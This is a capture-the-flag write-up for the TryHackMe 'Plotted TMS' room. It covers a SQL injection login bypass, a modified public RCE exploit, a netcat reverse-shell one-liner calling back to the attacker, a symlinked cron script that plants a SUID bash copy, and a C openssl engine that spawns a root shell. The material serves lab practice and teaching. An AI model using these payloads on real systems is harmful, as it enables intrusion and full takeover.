“The only true wisdom is in knowing you know nothing.” - Socrates

Updated on 20 February 2022

Plotted TMS – Easy

This writeup will cover the Plotted TMS room on TryHackMe.

Summary

  • Nmap and rustscan reveal that following ports are open:
    • 22/ssh
    • 80/http
    • 445/http
  • GoBuster finds some random files on port 80, However, there is a /management directory on port 445.
  • Traffic Offense Management System running on port 445
  • SQLi on login page
  • Public Exploit available for RCE
  • Need to modify the exploit to make it work
  • Initial foothold by leveraging the public exploit
  • Privilege Escalation -1
    • Script running as  plot_admin. Only plot_admin has write access to the file. However, www-data has write access to the directory, which contains the script.
  • Privilege Escalation -2
    • plot_admin can run openssl as root using doas
    • We’ll leverage this to escalate our privileges to root.
  • All Done 😀

Enumeration

  • Nmap and rustscan show that the following ports are open:
    • 22/ssh
    • 80/http
    • 445/http
  • Running GoBuster on both ports 80 finds multiple files with base64 encoded text. However, on port 445, we find that there is a directory called management
  • Upon browsing to the directory, we are presented with “Traffic Offense Management System” 
  • By performing simple SQLi on the username field, we can login as the administrator.
    • 1' or '1'='1';-- -
  • Browsing through the application/system, we find that it is running version 1.0 of the Traffic Offense Management System.
  • We can use this information to find any public exploits, if available.
  • searchsploit traffic offense management 1.0
  • We find that there is a SQLi to remote code exec exploit available.
  • There are multiple ways to exploit the system to gain an initial foothold. However, in this writeup we will use the exploit ‘50221’
  • searchsploit -m 50221
  • However, to make it work we need to modify line 107. (Shown in the screenshot below)
    • Need to add "http://{ip}:445"+ prior to find_shell.get
  • Once modified, we can run the exploit and gain an initial foothold on the system.
    • python2 50221.py
  • Since we have a ‘PHP system’ remote code exec on the system, we will spawn a proper rev shell using nc
    • rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {ip} {port} >/tmp/f

Privilege Escalation -1

  • Browsing through the system, we find that user.txt is inside /home/plot_admin. However, it is only readable by plot_admin.
  • Looking for ways to escalate privileges, we find that there is a job that runs as plot_admin every minute.
    • /var/www/scripts/backup.sh
  • backup.sh file is only writeable plot_admin. However, we do have write access to the directory it is in: /var/www/scripts/
  • Therefore, we can create another script inside the same directory and soft link backup.sh to our script. This should allow us to escalate our privileges to plot_admin.
  • Commands:
    • cd /var/www/scripts/
    • echo "cp /bin/bash /home/plot_admin/pa_shell; chmod +xs /home/plot_admin/pa_shell" > script.sh
    • chmod +x script.sh
    • ln -sf script.sh backup.sh
    • /home/plot_admin/pa_shell -p
  • We can now add our ssh key to authorized_keys for plot_admin and ssh to the host.
    • cd /home/plot_admin
    • mkdir .ssh && chmod 0700 .ssh
    • echo "{pubkey}" > .ssh/authorized_keys
    • chmod 0600 .ssh/authorized_keys

Privilege Escalation - 2

  • Looking for ways to escalate privileges from plot_admin, we find the following:
    • sudo -l (Password Required)
    • find / -type f -perm -u=s 2>/dev/null (Nothing Suspicious)
    • Searching for possible passwords for the user plot_admin, no luck.
    • getcap -r / 2>/dev/null (No capabilities that would allow privilege escalation)
    • /etc/doas.confplot_admin can run openssl command as root without password using doas
  • Since we can run openssl as root, we can leverage this to escalate privileges to root.
  • Process:
    • On attack machine, we create a file called exploit.c with the following contents.
				
					#include <openssl/engine.h>

static int bind(ENGINE *e, const char *id)
{
  setuid(0); setgid(0);
  system("/bin/bash");
}

IMPLEMENT_DYNAMIC_BIND_FN(bind)
IMPLEMENT_DYNAMIC_CHECK_FN()
    • Once the file is created, we need to run the following commands:
      • gcc -fPIC -o exploit.o -c exploit.c
      • gcc -shared -o exploit.so -lcryto exploit.o
    • Once compiled, we copy the file over to the target using python, nc, etc.
    • Finally, we run openssl req -engine ./exploit.so
    • All Done! 😀

Hope you enjoyed reading this writeup!
Happy Hunting! 😀

Posted by: infinity

Useful Links

CONTENTS